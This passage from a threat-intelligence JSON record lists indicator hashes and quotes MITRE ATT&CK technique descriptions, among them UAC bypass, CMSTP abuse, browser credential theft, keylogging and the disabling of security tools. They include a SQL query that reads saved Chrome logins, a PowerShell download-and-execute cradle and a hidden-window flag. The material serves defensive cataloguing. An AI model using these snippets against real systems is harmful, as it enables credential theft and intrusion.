"127f135246aa0246a8b4d0415538aacdf27f509ff75756556ce18999326f1048"}, {"type": "sha1", "value": "636f25872c47c16ca0f39b92e26300f47295a8e2"}, {"type": "md5", "value": "22cc17db39122a759fb63c521f1096d1"}, {"type": "sha256", "value": "8b33e0f32c42a317e3d9cd67d5a6dc68e91a6cf9dd44742162858e7d83cf2073"}, {"type": "sha1", "value": "fdb4c185004dbe8f5de441faef5c09b25cc136f8"}, {"type": "md5", "value": "de2f77d1b0e9d6eb24799fa3c7b4047e"}, {"type": "sha256", "value": "bd97d5cab2d09b001d1b9e08890bce1a2b2cf8542a4b31c86b2def59328cafb2"}, {"type": "sha1", "value": "6da138326647ee1a7161311bf3b7a903ad27b5c1"}, {"type": "md5", "value": "73ee00c19b4d6355c76e2df9d4f3bfda"}, {"type": "sha1", "value": "6af70b6a8ef29906b1e671fab79e3394e182bdca"}, {"type": "sha256", "value": "1617552169df805405b1bb70f742d6eac5af342f31c6e39ff6b9613bd2392354"}, {"type": "md5", "value": "face4acb042c323fca0ead3463d0e896"}, {"type": "sha256", "value": "4c897108e8e793d6904110928c996815c302d6975c9bc61162149e855a963d50"}, {"type": "sha1", "value": "b3f6efdbac7547ee988417c636a9eea999e8eebb"}, {"type": "sha256", "value": "14b2ac356ed75d10ef40bbaaa48e7dd9fff7de9719c2a43ad123fe843dd4e4e2"}, {"type": "md5", "value": "9b42816d0a8f4659e51514f275a7e50c"}, {"type": "sha1", "value": "d90602ed7d09621b1c7a25f8dbab228795b23bc0"}], "galaxies": [{"id": "86c79461-ac7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", "created_on": "2021-05-04T02:00:40.000Z", "name": "Archive via Custom Method"}, {"id": "bc89553e-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", "created_on": "2020-12-09T03:00:47.000Z", "name": "Bypass User Account Control"}, {"id": "a9574290-6f7e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)", "created_on": "2020-03-26T16:27:18.000Z", "name": "Clipboard Data"}, {"id": "9986a745-c546-4cf3-85d9-44e26d098af0", "category": "trellix-tool", "description": "Windows command interpreter, Cmd.exe. If used without parameters, cmd displays the version and copyright information of the operating system. Source: Microsoft", "created_on": "2021-08-04T21:00:38.000Z", "name": "Cmd"}, {"id": "29a1d178-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", "created_on": "2020-12-18T13:23:05.000Z", "name": "CMSTP"}, {"id": "2a1d69a7-a9d6-4021-a00d-187f6c3c8596", "category": "trellix-tool", "description": "cmstp installs or removes a Connection Manager service profile.\r\n\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "created_on": "2022-01-24T22:16:30.000Z", "name": "cmstp"}, {"id": "2a2c7d3e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim\u2019s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "created_on": "2020-12-03T14:38:09.000Z", "name": "Credentials from Web Browsers"}, {"id": "c416f2ea-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Data from Local System"}, {"id": "a0f25711-5ae8-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.", "created_on": "2020-02-29T11:42:56.000Z", "name": "Data from Removable Media"}, {"id": "e49e1bf6-604b-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", "created_on": "2021-01-27T03:01:03.000Z", "name": "Dead Drop Resolver"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "eafe3771-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional.  By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool\u2019s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)", "created_on": "2020-11-20T22:08:28.000Z", "name": "Disable or Modify Tools"}, {"id": "0411111d-f0e4-4789-bb2c-fd8337c71b15", "category": "mitre-attack-pattern", "description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)", "created_on": "2023-02-03T22:16:36.000Z", "name": "Dynamic API Resolution"}, {"id": "64bfbda1-e7da-4cb4-a174-be1ced5ec4b7", "category": "trellix-tool", "description": "Electron Framework lets developers write cross-platform desktop applications using JavaScript, HTML and CSS. Electron is based on Node.js and Chromium, it is used by Visual Studio Code and many other apps.\r\n\r\nSource: github com/electron/electron", "created_on": "2024-06-13T21:13:59.000Z", "name": "Electron Framework"}, {"id": "c4976d05-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Exfiltration Over C2 Channel"}, {"id": "c3e4c145-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", "created_on": "2020-02-26T13:49:10.000Z", "name": "File and Directory Discovery"}, {"id": "ea767971-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.", "created_on": "2020-11-20T22:08:27.000Z", "name": "File Deletion"}, {"id": "4532b1ca-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "Finance"}, {"id": "389ff6b7-0976-4d8b-bcdf-eb6997519b48", "category": "mitre-attack-pattern", "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", "created_on": "2024-02-08T22:14:05.000Z", "name": "Financial Theft"}, {"id": "3a1f3eb9-ad7b-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-13T13:38:55.000Z", "name": "Game"}, {"id": "c664b910-2977-414a-ada9-ccfaba52761b", "category": "trellix-tool", "description": "Google Chrome is a web browser developed by Google. It is known for its speed, simplicity, and user-friendly interface. Launched in 2008, Chrome has become one of the most widely used browsers worldwide. It offers features such as tabbed browsing, synchronization across devices, an extensive library of extensions, and strong security measures. Chrome is built on the open-source Chromium project and is available on various operating systems, including Windows, macOS, Linux, Android, and iOS.", "created_on": "2023-08-23T21:12:35.000Z", "name": "Google Chrome"}, {"id": "bc9362b6-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)\n\nThe Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.\n\nAdversaries may also leverage cmd.exe(Citation: Cybereason - Hidden Malicious Remote Access) as a parent process, and then utilize a LOLBin, such as DeviceCredentialDeployment.exe,(Citation: LOLBAS Project GitHub Device Cred Dep)(Citation: SecureList BlueNoroff Device Cred Dev) to hide windows.", "created_on": "2020-12-09T03:00:47.000Z", "name": "Hidden Window"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "0b389e29-44cb-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", "created_on": "2020-12-23T03:00:42.000Z", "name": "Internal Proxy"}, {"id": "dd2ee04e-3a67-11eb-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-12-09T21:45:33.000Z", "name": "IT - Security"}, {"id": "2a156d6e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "created_on": "2020-12-03T14:38:09.000Z", "name": "Keylogging"}, {"id": "f9e1fe47-b551-45ab-b8e7-915a03f82906", "category": "mitre-attack-pattern", "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\\Environment\\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", "created_on": "2022-09-02T21:17:04.000Z", "name": "Logon Script (Windows)"}, {"id": "beab4bcf-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Masquerade Task or Service"}, {"id": "e21c4cbb-1974-4025-8c29-6f6f76dbf240", "category": "trellix-tool", "description": "Microsoft Edge is a web browser created by Microsoft.", "created_on": "2023-09-21T05:13:07.000Z", "name": "Microsoft Edge"}, {"id": "c3ce2246-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Modify Registry"}, {"id": "c3774e67-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of 